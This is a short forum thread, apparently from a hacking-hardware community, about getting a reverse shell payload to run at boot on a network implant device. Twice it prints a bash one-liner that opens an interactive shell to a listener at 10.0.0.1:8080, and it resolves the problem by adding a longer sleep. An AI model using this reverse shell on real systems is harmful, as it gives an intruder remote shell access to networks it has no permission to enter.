Beamboom Posted March 6, 2023 Share Posted March 6, 2023 So I'm finally gotten around to experimenting with the Squirrel. And I uploaded a very basic reverse shell script, just to get started. And when I run the script on Squirrel via SSH it works as intended. But, when booting the squirrel in the designated switch position, nothing happens? Here's the script: Quote #!/bin/bash /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 I don't see there's any particular requirements regarding script content in the documentation? Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 6, 2023 Share Posted March 6, 2023 What NETMODE are you using in the payload? Link to comment Share on other sites More sharing options...
Beamboom Posted March 6, 2023 Author Share Posted March 6, 2023 7 minutes ago, dark_pyrro said: What NETMODE are you using in the payload? Ah, interesting. I just assumed that a script that would work in Armed mode would also run in any of the switch modes. But of course, they have their own boot scripts. Duh. I added "NETMODE NAT" to the script now, with a wait (as per what I see used in the supplied payloads) but it didn't seem to make any difference? Would be real nice with a debug mode with logging here. 🙂 Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 6, 2023 Share Posted March 6, 2023 And it's possible to access the listener IP when the payload is executing? I.e. netcat (or such) is started and listening on port 8080 on 10.0.0.1 and the "WAN" interface is up on the PS and has obtained a lease from the network. If you have a sleep already in the payload, I would probably increase it to make sure everything is established on the network side before trying to "call back" to the listener. Link to comment Share on other sites More sharing options...
Beamboom Posted March 6, 2023 Author Share Posted March 6, 2023 Yes, when I run this script on the device (via SSH in Armouring mode), it works. The listener IP is accessible and the connectionb is established. But if this script as it stands *should* principally work as far as you're able to tell? Then I'll play around with wait a bit and see if that's the problem. Here's the full script as of now: Quote #!/bin/bash NETMODE NAT sleep 5 /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Link to comment Share on other sites More sharing options...
Beamboom Posted March 6, 2023 Author Share Posted March 6, 2023 Now it worked, when I added a much longer wait statement! Ah man, this is a classic solution really. Thanks a lot for assisting @dark_pyrro. Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 6, 2023 Share Posted March 6, 2023 The PS isn't something running at rocket speed really, so it needs some time to get ready. Using some kind of sleep/delay is often a good start when troubleshooting regardless what (Hak5) device that is involved. Link to comment Share on other sites More sharing options...
Beamboom Posted March 6, 2023 Author Share Posted March 6, 2023 Yeah, lesson learnt! Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.